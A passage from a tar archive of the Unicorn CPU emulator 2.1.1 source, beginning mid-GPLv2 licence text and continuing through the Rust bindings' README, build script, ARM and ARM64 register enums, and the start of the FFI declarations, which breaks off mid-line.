you distribute copies of the software, or if you modify it. For example, if you distribute copies of such a program, whether gratis or for a fee, you must give the recipients all the rights that you have. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. We protect your rights with two steps: (1) copyright the software, and (2) offer you this license which gives you legal permission to copy, distribute and/or modify the software. Also, for each author's protection and ours, we want to make certain that everyone understands that there is no warranty for this free software. If the software is modified by someone else and passed on, we want its recipients to know that what they have is not the original, so that any problems introduced by others will not reflect on the original authors' reputations. Finally, any free program is threatened constantly by software patents. We wish to avoid the danger that redistributors of a free program will individually obtain patent licenses, in effect making the program proprietary. To prevent this, we have made it clear that any patent must be licensed for everyone's free use or not licensed at all. The precise terms and conditions for copying, distribution and modification follow. GNU GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 0. This License applies to any program or other work which contains a notice placed by the copyright holder saying it may be distributed under the terms of this General Public License. The "Program", below, refers to any such program or work, and a "work based on the Program" means either the Program or any derivative work under copyright law: that is to say, a work containing the Program or a portion of it, either verbatim or with modifications and/or translated into another language. (Hereinafter, translation is included without limitation in the term "modification".) Each licensee is addressed as "you". Activities other than copying, distribution and modification are not covered by this License; they are outside its scope. The act of running the Program is not restricted, and the output from the Program is covered only if its contents constitute a work based on the Program (independent of having been made by running the Program). Whether that is true depends on what the Program does. 1. You may copy and distribute verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and give any other recipients of the Program a copy of this License along with the Program. You may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in exchange for a fee. 2. You may modify your copy or copies of the Program or any portion of it, thus forming a work based on the Program, and copy and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions: a) You must cause the modified files to carry prominent notices stating that you changed the files and the date of any change. b) You must cause any work that you distribute or publish, that in whole or in part contains or is derived from the Program or any part thereof, to be licensed as a whole at no charge to all third parties under the terms of this License. c) If the modified program normally reads commands interactively when run, you must cause it, when started running for such interactive use in the most ordinary way, to print or display an announcement including an appropriate copyright notice and a notice that there is no warranty (or else, saying that you provide a warranty) and that users may redistribute the program under these conditions, and telling the user how to view a copy of this License. (Exception: if the Program itself is interactive but does not normally print such an announcement, your work based on the Program is not required to print an announcement.) These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the Program, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the Program, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it. Thus, it is not the intent of this section to claim rights or contest your rights to work written entirely by you; rather, the intent is to exercise the right to control the distribution of derivative or collective works based on the Program. In addition, mere aggregation of another work not based on the Program with the Program (or with a work based on the Program) on a volume of a storage or distribution medium does not bring the other work under the scope of this License. 3. You may copy and distribute the Program (or a work based on it, under Section 2) in object code or executable form under the terms of Sections 1 and 2 above provided that you also do one of the following: a) Accompany it with the complete corresponding machine-readable source code, which must be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, b) Accompany it with a written offer, valid for at least three years, to give any third party, for a charge no more than your cost of physically performing source distribution, a complete machine-readable copy of the corresponding source code, to be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, c) Accompany it with the information you received as to the offer to distribute corresponding source code. (This alternative is allowed only for noncommercial distribution and only if you received the program in object code or executable form with such an offer, in accord with Subsection b above.) The source code for a work means the preferred form of the work for making modifications to it. For an executable work, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the executable. However, as a special exception, the source code distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable. If distribution of executable or object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place counts as distribution of the source code, even though third parties are not compelled to copy the source along with the object code. 4. You may not copy, modify, sublicense, or distribute the Program except as expressly provided under this License. Any attempt otherwise to copy, modify, sublicense or distribute the Program is void, and will automatically terminate your rights under this License. However, parties who have received copies, or rights, from you under this License will not have their licenses terminated so long as such parties remain in full compliance. 5. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to modify or distribute the Program or its derivative works. These actions are prohibited by law if you do not accept this License. Therefore, by modifying or distributing the Program (or any work based on the Program), you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or modifying the Program or works based on it. 6. Each time you redistribute the Program (or any work based on the Program), the recipient automatically receives a license from the original licensor to copy, distribute or modify the Program subject to these terms and conditions. You may not impose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for enforcing compliance by third parties to this License. 7. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Program at all. For example, if a patent license would not permit royalty-free redistribution of the Program by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Program. If any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is intended to apply and the section as a whole is intended to apply in other circumstances. It is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of any such claims; this section has the sole purpose of protecting the integrity of the free software distribution system, which is implemented by public license practices. Many people have made generous contributions to the wide range of software distributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he or she is willing to distribute software through any other system and a licensee cannot impose that choice. This section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License. 8. If the distribution and/or use of the Program is restricted in certain countries either by patents or by copyrighted interfaces, the original copyright holder who places the Program under this License may add an explicit geographical distribution limitation excluding those countries, so that distribution is permitted only in or among countries not thus excluded. In such case, this License incorporates the limitation as if written in the body of this License. 9. The Free Software Foundation may publish revised and/or new versions of the General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies a version number of this License which applies to it and "any later version", you have the option of following the terms and conditions either of that version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of this License, you may choose any version ever published by the Free Software Foundation. 10. If you wish to incorporate parts of the Program into other free programs whose distribution conditions are different, write to the author to ask for permission. For software which is copyrighted by the Free Software Foundation, write to the Free Software Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally. NO WARRANTY 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively convey the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. <one line to give the program's name and a brief idea of what it does.> Copyright (C) <year> <name of author> This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Also add information on how to contact you by electronic and paper mail. If the program is interactive, make it output a short notice like this when it starts in an interactive mode: Gnomovision version 69, Copyright (C) year name of author Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details. The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, the commands you use may be called something other than `show w' and `show c'; they could even be mouse-clicks or menu items--whatever suits your program. You should also get your employer (if you work as a programmer) or your school, if any, to sign a "copyright disclaimer" for the program, if necessary. Here is a sample; alter the names: Yoyodyne, Inc., hereby disclaims all copyright interest in the program `Gnomovision' (which makes passes at compilers) written by James Hacker. <signature of Ty Coon>, 1 April 1989 Ty Coon, President of Vice This General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Lesser General Public License instead of this License. ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/rust/README.md���������������������������������������������������������������0000664�0000000�0000000�00000002711�14675241067�0017256�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# Unicorn-engine Rust bindings for the [Unicorn](http://www.unicorn-engine.org/) emulator with utility functions. Checkout Unicorn2 source code at [dev branch](https://github.com/unicorn-engine/unicorn/tree/dev). ```rust use unicorn_engine::{Unicorn, RegisterARM}; use unicorn_engine::unicorn_const::{Arch, Mode, Permission, SECOND_SCALE}; fn main() { let arm_code32: Vec<u8> = vec![0x17, 0x00, 0x40, 0xe2]; // sub r0, #23 let mut unicorn = Unicorn::new(Arch::ARM, Mode::LITTLE_ENDIAN).expect("failed to initialize Unicorn instance"); let emu = &mut unicorn; emu.mem_map(0x1000, 0x4000, Permission::ALL).expect("failed to map code page"); emu.mem_write(0x1000, &arm_code32).expect("failed to write instructions"); emu.reg_write(RegisterARM::R0, 123).expect("failed write R0"); emu.reg_write(RegisterARM::R5, 1337).expect("failed write R5"); let _ = emu.emu_start(0x1000, (0x1000 + arm_code32.len()) as u64, 10 * SECOND_SCALE, 1000); assert_eq!(emu.reg_read(RegisterARM::R0), Ok(100)); assert_eq!(emu.reg_read(RegisterARM::R5), Ok(1337)); } ``` Further sample code can be found in [tests](../../tests/rust-tests/main.rs). ## Usage Add this to your `Cargo.toml`: ``` [dependencies] unicorn-engine = "2.1.1" ``` ## Acknowledgements These bindings are based on Sébastien Duquette's (@ekse) [unicorn-rs](https://github.com/unicorn-rs/unicorn-rs). We picked up the project, as it is no longer maintained. Thanks to all contributors. �������������������������������������������������������unicorn-2.1.1/bindings/rust/build.rs����������������������������������������������������������������0000664�0000000�0000000�00000014117�14675241067�0017447�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������use pkg_config; use std::env; use std::path::PathBuf; use std::process::Command; fn ninja_available() -> bool { Command::new("ninja").arg("--version").spawn().is_ok() } fn msvc_cmake_tools_available() -> bool { Command::new("cmake").arg("--version").spawn().is_ok() && ninja_available() } fn setup_env_msvc(compiler: &cc::Tool) { // If PATH already contains what we need, skip this if msvc_cmake_tools_available() { return; } let target = env::var("TARGET").unwrap(); let devenv = cc::windows_registry::find_tool(target.as_str(), "devenv"); let tool_root: PathBuf = match devenv { Some(devenv_tool) => devenv_tool.path().parent().unwrap().to_path_buf(), None => { // if devenv (i.e. Visual Studio) was not found, assume compiler is // from standalone Build Tools and look there instead. // this should be done properly in cc crate, but for now it's not. let tools_name = std::ffi::OsStr::new("BuildTools"); let compiler_path = compiler.path().to_path_buf(); compiler_path .iter() .find(|x| *x == tools_name) .expect("Failed to find devenv or Build Tools"); compiler_path .iter() .take_while(|x| *x != tools_name) .collect::<PathBuf>() .join(tools_name) .join(r"Common7\IDE") } }; let cmake_pkg_dir = tool_root.join(r"CommonExtensions\Microsoft\CMake"); let cmake_path = cmake_pkg_dir.join(r"CMake\bin\cmake.exe"); let ninja_path = cmake_pkg_dir.join(r"Ninja\ninja.exe"); if !cmake_path.is_file() { panic!("missing cmake"); } if !ninja_path.is_file() { panic!("missing ninja"); } // append cmake and ninja location to PATH if let Some(path) = env::var_os("PATH") { let mut paths = env::split_paths(&path).collect::<Vec<_>>(); for tool_path in [cmake_path, ninja_path] { paths.push(tool_path.parent().unwrap().to_path_buf()); } let new_path = env::join_paths(paths).unwrap(); env::set_var("PATH", &new_path); } } fn build_with_cmake() { let uc_dir = PathBuf::from(env::var("CARGO_MANIFEST_DIR").unwrap()); let compiler = cc::Build::new().get_compiler(); let has_ninja = if compiler.is_like_msvc() { setup_env_msvc(&compiler); // this is a BIG HACK that should be fixed in unicorn's cmake!! // but for now, tell link.exe to ignore multiply defined symbol names println!("cargo:rustc-link-arg=/FORCE:MULTIPLE"); true } else { ninja_available() }; // cc crate (as of 1.0.73) misdetects clang as gnu on apple if compiler.is_like_gnu() && env::consts::OS != "macos" { // see comment on /FORCE:MULTIPLE println!("cargo:rustc-link-arg=-Wl,-allow-multiple-definition"); } let mut config = cmake::Config::new(&uc_dir); if has_ninja { config.generator("Ninja"); } let mut archs = String::new(); if std::env::var("CARGO_FEATURE_ARCH_X86").is_ok() { archs.push_str("x86;"); } if std::env::var("CARGO_FEATURE_ARCH_ARM").is_ok() { archs.push_str("arm;"); } if std::env::var("CARGO_FEATURE_ARCH_AARCH64").is_ok() { archs.push_str("aarch64;"); } if std::env::var("CARGO_FEATURE_ARCH_RISCV").is_ok() { archs.push_str("riscv;"); } if std::env::var("CARGO_FEATURE_ARCH_MIPS").is_ok() { archs.push_str("mips;"); } if std::env::var("CARGO_FEATURE_ARCH_SPARC").is_ok() { archs.push_str("sparc;"); } if std::env::var("CARGO_FEATURE_ARCH_M68K").is_ok() { archs.push_str("m68k;"); } if std::env::var("CARGO_FEATURE_ARCH_PPC").is_ok() { archs.push_str("ppc;"); } if std::env::var("CARGO_FEATURE_ARCH_S390X").is_ok() { archs.push_str("s390x;"); } if std::env::var("CARGO_FEATURE_ARCH_TRICORE").is_ok() { archs.push_str("tricore;"); } if !archs.is_empty() { archs.pop(); } // need to clear build target and append "build" to the path because // unicorn's CMakeLists.txt doesn't properly support 'install', so we use // the build artifacts from the build directory, which cmake crate sets // to "<out_dir>/build/" let dst = config .define("UNICORN_BUILD_TESTS", "OFF") .define("UNICORN_INSTALL", "OFF") .define("UNICORN_ARCH", archs) .no_build_target(true) .build(); println!( "cargo:rustc-link-search=native={}", dst.join("build").display() ); // Lazymio(@wtdcode): Dynamic link may break. See: https://github.com/rust-lang/cargo/issues/5077 if cfg!(feature = "dynamic_linkage") { if compiler.is_like_msvc() { println!("cargo:rustc-link-lib=dylib=unicorn-import"); } else { println!("cargo:rustc-link-lib=dylib=unicorn"); } } else { println!("cargo:rustc-link-lib=static=unicorn"); } if !compiler.is_like_msvc() { println!("cargo:rustc-link-lib=pthread"); println!("cargo:rustc-link-lib=m"); } } fn main() { match pkg_config::Config::new() .atleast_version("2") .cargo_metadata(false) .probe("unicorn") { Ok(lib) => { for dir in lib.link_paths { println!("cargo:rustc-link-search=native={}", dir.to_str().unwrap()); } if cfg!(feature = "dynamic_linkage") { if cc::Build::new().get_compiler().is_like_msvc() { println!("cargo:rustc-link-lib=dylib=unicorn-import"); } else { println!("cargo:rustc-link-lib=dylib=unicorn"); } } else { println!("cargo:rustc-link-arg=-Wl,-allow-multiple-definition"); println!("cargo:rustc-link-lib=static=unicorn"); println!("cargo:rustc-link-lib=pthread"); println!("cargo:rustc-link-lib=m"); } } Err(_) => { build_with_cmake(); } }; } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/rust/src/��������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016565�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/rust/src/arm.rs��������������������������������������������������������������0000664�0000000�0000000�00000010215�14675241067�0017711�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#![allow(non_camel_case_types)] // For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT #[repr(C)] #[derive(PartialEq, Debug, Clone, Copy)] pub enum RegisterARM { // ARM registers INVALID = 0, APSR = 1, APSR_NZCV = 2, CPSR = 3, FPEXC = 4, FPINST = 5, FPSCR = 6, FPSCR_NZCV = 7, FPSID = 8, ITSTATE = 9, LR = 10, PC = 11, SP = 12, SPSR = 13, D0 = 14, D1 = 15, D2 = 16, D3 = 17, D4 = 18, D5 = 19, D6 = 20, D7 = 21, D8 = 22, D9 = 23, D10 = 24, D11 = 25, D12 = 26, D13 = 27, D14 = 28, D15 = 29, D16 = 30, D17 = 31, D18 = 32, D19 = 33, D20 = 34, D21 = 35, D22 = 36, D23 = 37, D24 = 38, D25 = 39, D26 = 40, D27 = 41, D28 = 42, D29 = 43, D30 = 44, D31 = 45, FPINST2 = 46, MVFR0 = 47, MVFR1 = 48, MVFR2 = 49, Q0 = 50, Q1 = 51, Q2 = 52, Q3 = 53, Q4 = 54, Q5 = 55, Q6 = 56, Q7 = 57, Q8 = 58, Q9 = 59, Q10 = 60, Q11 = 61, Q12 = 62, Q13 = 63, Q14 = 64, Q15 = 65, R0 = 66, R1 = 67, R2 = 68, R3 = 69, R4 = 70, R5 = 71, R6 = 72, R7 = 73, R8 = 74, R9 = 75, R10 = 76, R11 = 77, R12 = 78, S0 = 79, S1 = 80, S2 = 81, S3 = 82, S4 = 83, S5 = 84, S6 = 85, S7 = 86, S8 = 87, S9 = 88, S10 = 89, S11 = 90, S12 = 91, S13 = 92, S14 = 93, S15 = 94, S16 = 95, S17 = 96, S18 = 97, S19 = 98, S20 = 99, S21 = 100, S22 = 101, S23 = 102, S24 = 103, S25 = 104, S26 = 105, S27 = 106, S28 = 107, S29 = 108, S30 = 109, S31 = 110, C1_C0_2 = 111, C13_C0_2 = 112, C13_C0_3 = 113, IPSR = 114, MSP = 115, PSP = 116, CONTROL = 117, IAPSR = 118, EAPSR = 119, XPSR = 120, EPSR = 121, IEPSR = 122, PRIMASK = 123, BASEPRI = 124, BASEPRI_MAX = 125, FAULTMASK = 126, APSR_NZCVQ = 127, APSR_G = 128, APSR_NZCVQG = 129, IAPSR_NZCVQ = 130, IAPSR_G = 131, IAPSR_NZCVQG = 132, EAPSR_NZCVQ = 133, EAPSR_G = 134, EAPSR_NZCVQG = 135, XPSR_NZCVQ = 136, XPSR_G = 137, XPSR_NZCVQG = 138, CP_REG = 139, ENDING = 140, } impl RegisterARM { // alias registers // (assoc) R13 = 12, // (assoc) R14 = 10, // (assoc) R15 = 11, // (assoc) SB = 75, // (assoc) SL = 76, // (assoc) FP = 77, // (assoc) IP = 78, pub const R13: RegisterARM = RegisterARM::SP; pub const R14: RegisterARM = RegisterARM::LR; pub const R15: RegisterARM = RegisterARM::PC; pub const SB: RegisterARM = RegisterARM::R9; pub const SL: RegisterARM = RegisterARM::R10; pub const FP: RegisterARM = RegisterARM::R11; pub const IP: RegisterARM = RegisterARM::R12; } impl From<RegisterARM> for i32 { fn from(r: RegisterARM) -> Self { r as i32 } } #[repr(i32)] #[derive(Debug, PartialEq, Eq, Copy, Clone)] pub enum ArmCpuModel { UC_CPU_ARM_926 = 0, UC_CPU_ARM_946 = 1, UC_CPU_ARM_1026 = 2, UC_CPU_ARM_1136_R2 = 3, UC_CPU_ARM_1136 = 4, UC_CPU_ARM_1176 = 5, UC_CPU_ARM_11MPCORE = 6, UC_CPU_ARM_CORTEX_M0 = 7, UC_CPU_ARM_CORTEX_M3 = 8, UC_CPU_ARM_CORTEX_M4 = 9, UC_CPU_ARM_CORTEX_M7 = 10, UC_CPU_ARM_CORTEX_M33 = 11, UC_CPU_ARM_CORTEX_R5 = 12, UC_CPU_ARM_CORTEX_R5F = 13, UC_CPU_ARM_CORTEX_A7 = 14, UC_CPU_ARM_CORTEX_A8 = 15, UC_CPU_ARM_CORTEX_A9 = 16, UC_CPU_ARM_CORTEX_A15 = 17, UC_CPU_ARM_TI925T = 18, UC_CPU_ARM_SA1100 = 19, UC_CPU_ARM_SA1110 = 20, UC_CPU_ARM_PXA250 = 21, UC_CPU_ARM_PXA255 = 22, UC_CPU_ARM_PXA260 = 23, UC_CPU_ARM_PXA261 = 24, UC_CPU_ARM_PXA262 = 25, UC_CPU_ARM_PXA270 = 26, UC_CPU_ARM_PXA270A0 = 27, UC_CPU_ARM_PXA270A1 = 28, UC_CPU_ARM_PXA270B0 = 29, UC_CPU_ARM_PXA270B1 = 30, UC_CPU_ARM_PXA270C0 = 31, UC_CPU_ARM_PXA270C5 = 32, } impl From<ArmCpuModel> for i32 { fn from(value: ArmCpuModel) -> Self { value as i32 } } impl From<&ArmCpuModel> for i32 { fn from(value: &ArmCpuModel) -> Self { *value as i32 } } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/rust/src/arm64.rs������������������������������������������������������������0000664�0000000�0000000�00000012756�14675241067�0020077�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#![allow(non_camel_case_types)] // ARM64 registers #[repr(C)] #[derive(PartialEq, Debug, Clone, Copy)] pub enum RegisterARM64 { INVALID = 0, X29 = 1, X30 = 2, NZCV = 3, SP = 4, WSP = 5, WZR = 6, XZR = 7, B0 = 8, B1 = 9, B2 = 10, B3 = 11, B4 = 12, B5 = 13, B6 = 14, B7 = 15, B8 = 16, B9 = 17, B10 = 18, B11 = 19, B12 = 20, B13 = 21, B14 = 22, B15 = 23, B16 = 24, B17 = 25, B18 = 26, B19 = 27, B20 = 28, B21 = 29, B22 = 30, B23 = 31, B24 = 32, B25 = 33, B26 = 34, B27 = 35, B28 = 36, B29 = 37, B30 = 38, B31 = 39, D0 = 40, D1 = 41, D2 = 42, D3 = 43, D4 = 44, D5 = 45, D6 = 46, D7 = 47, D8 = 48, D9 = 49, D10 = 50, D11 = 51, D12 = 52, D13 = 53, D14 = 54, D15 = 55, D16 = 56, D17 = 57, D18 = 58, D19 = 59, D20 = 60, D21 = 61, D22 = 62, D23 = 63, D24 = 64, D25 = 65, D26 = 66, D27 = 67, D28 = 68, D29 = 69, D30 = 70, D31 = 71, H0 = 72, H1 = 73, H2 = 74, H3 = 75, H4 = 76, H5 = 77, H6 = 78, H7 = 79, H8 = 80, H9 = 81, H10 = 82, H11 = 83, H12 = 84, H13 = 85, H14 = 86, H15 = 87, H16 = 88, H17 = 89, H18 = 90, H19 = 91, H20 = 92, H21 = 93, H22 = 94, H23 = 95, H24 = 96, H25 = 97, H26 = 98, H27 = 99, H28 = 100, H29 = 101, H30 = 102, H31 = 103, Q0 = 104, Q1 = 105, Q2 = 106, Q3 = 107, Q4 = 108, Q5 = 109, Q6 = 110, Q7 = 111, Q8 = 112, Q9 = 113, Q10 = 114, Q11 = 115, Q12 = 116, Q13 = 117, Q14 = 118, Q15 = 119, Q16 = 120, Q17 = 121, Q18 = 122, Q19 = 123, Q20 = 124, Q21 = 125, Q22 = 126, Q23 = 127, Q24 = 128, Q25 = 129, Q26 = 130, Q27 = 131, Q28 = 132, Q29 = 133, Q30 = 134, Q31 = 135, S0 = 136, S1 = 137, S2 = 138, S3 = 139, S4 = 140, S5 = 141, S6 = 142, S7 = 143, S8 = 144, S9 = 145, S10 = 146, S11 = 147, S12 = 148, S13 = 149, S14 = 150, S15 = 151, S16 = 152, S17 = 153, S18 = 154, S19 = 155, S20 = 156, S21 = 157, S22 = 158, S23 = 159, S24 = 160, S25 = 161, S26 = 162, S27 = 163, S28 = 164, S29 = 165, S30 = 166, S31 = 167, W0 = 168, W1 = 169, W2 = 170, W3 = 171, W4 = 172, W5 = 173, W6 = 174, W7 = 175, W8 = 176, W9 = 177, W10 = 178, W11 = 179, W12 = 180, W13 = 181, W14 = 182, W15 = 183, W16 = 184, W17 = 185, W18 = 186, W19 = 187, W20 = 188, W21 = 189, W22 = 190, W23 = 191, W24 = 192, W25 = 193, W26 = 194, W27 = 195, W28 = 196, W29 = 197, W30 = 198, X0 = 199, X1 = 200, X2 = 201, X3 = 202, X4 = 203, X5 = 204, X6 = 205, X7 = 206, X8 = 207, X9 = 208, X10 = 209, X11 = 210, X12 = 211, X13 = 212, X14 = 213, X15 = 214, X16 = 215, X17 = 216, X18 = 217, X19 = 218, X20 = 219, X21 = 220, X22 = 221, X23 = 222, X24 = 223, X25 = 224, X26 = 225, X27 = 226, X28 = 227, V0 = 228, V1 = 229, V2 = 230, V3 = 231, V4 = 232, V5 = 233, V6 = 234, V7 = 235, V8 = 236, V9 = 237, V10 = 238, V11 = 239, V12 = 240, V13 = 241, V14 = 242, V15 = 243, V16 = 244, V17 = 245, V18 = 246, V19 = 247, V20 = 248, V21 = 249, V22 = 250, V23 = 251, V24 = 252, V25 = 253, V26 = 254, V27 = 255, V28 = 256, V29 = 257, V30 = 258, V31 = 259, // pseudo registers PC = 260, CPACR_EL1 = 261, // thread registers, depreciated, use CP_REG instead TPIDR_EL0 = 262, TPIDRRO_EL0 = 263, TPIDR_EL1 = 264, PSTATE = 265, // exception link registers, depreciated, use CP_REG instead ELR_EL0 = 266, ELR_EL1 = 267, ELR_EL2 = 268, ELR_EL3 = 269, // stack pointers registers, depreciated, use CP_REG instead SP_EL0 = 270, SP_EL1 = 271, SP_EL2 = 272, SP_EL3 = 273, // other CP15 registers, depreciated, use CP_REG instead TTBR0_EL1 = 274, TTBR1_EL1 = 275, ESR_EL0 = 276, ESR_EL1 = 277, ESR_EL2 = 278, ESR_EL3 = 279, FAR_EL0 = 280, FAR_EL1 = 281, FAR_EL2 = 282, FAR_EL3 = 283, PAR_EL1 = 284, MAIR_EL1 = 285, VBAR_EL0 = 286, VBAR_EL1 = 287, VBAR_EL2 = 288, VBAR_EL3 = 289, CP_REG = 290, ENDING = 291, } impl RegisterARM64 { // alias registers // (assoc) IP0 = 215, // (assoc) IP1 = 216, // (assoc) FP = 1, // (assoc) LR = 2, pub const IP0: RegisterARM64 = RegisterARM64::X16; pub const IP1: RegisterARM64 = RegisterARM64::X17; pub const FP: RegisterARM64 = RegisterARM64::X29; pub const LR: RegisterARM64 = RegisterARM64::X30; } impl From<RegisterARM64> for i32 { fn from(r: RegisterARM64) -> Self { r as i32 } } #[repr(i32)] #[derive(Debug, Copy, Clone, PartialEq, Eq)] pub enum Arm64CpuModel { UC_CPU_ARM64_A57 = 0, UC_CPU_ARM64_A53 = 1, UC_CPU_ARM64_A72 = 2, UC_CPU_ARM64_MAX = 3, } impl From<Arm64CpuModel> for i32 { fn from(value: Arm64CpuModel) -> Self { value as i32 } } impl From<&Arm64CpuModel> for i32 { fn from(value: &Arm64CpuModel) -> Self { (*value) as i32 } } ������������������unicorn-2.1.1/bindings/rust/src/ffi.rs��������������������������������������������������������������0000664�0000000�0000000�00000020472�14675241067�0017704�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#![allow(non_camel_case_types)] #![allow(dead_code)] use crate::{Unicorn, UnicornInner}; use super::unicorn_const::{uc_error, Arch, HookType, MemRegion, MemType, Mode, Query, TlbEntry}; use alloc::rc::Weak; use core::cell::UnsafeCell; use core::ffi::c_void; use libc::{c_char, c_int}; pub type uc_handle = *mut c_void; // TODO: Use c_size_t as soon as it is stable. The c api exposes uc_hook as size_t pub type uc_hook = *mut c_void; pub type uc_context = *mut c_void; extern "C" { pub fn uc_version(major: *mut u32, minor: *mut u32) -> u32; pub fn uc_arch_supported(arch: Arch) -> bool; pub fn uc_open(arch: Arch, mode: Mode, engine: *mut uc_handle) -> uc_error; pub fn uc_close(engine: uc_handle) -> uc_error; pub fn uc_context_free(mem: uc_context) -> uc_error; pub fn uc_errno(engine: uc_handle) -> uc_error; pub fn uc_strerror(error_code: uc_error) -> *const c_char; pub fn uc_reg_write(engine: uc_handle, regid: c_int, value: *const c_void) -> uc_error; pub fn uc_reg_read(engine: uc_handle, regid: c_int, value: *mut c_void) -> uc_error; pub fn uc_mem_write( engine: uc_handle, address: u64, bytes: *const u8, size: libc::size_t, ) -> uc_error; pub fn uc_mem_read( engine: uc_handle, address: u64, bytes: *mut u8, size: libc::size_t, ) -> uc_error; pub fn 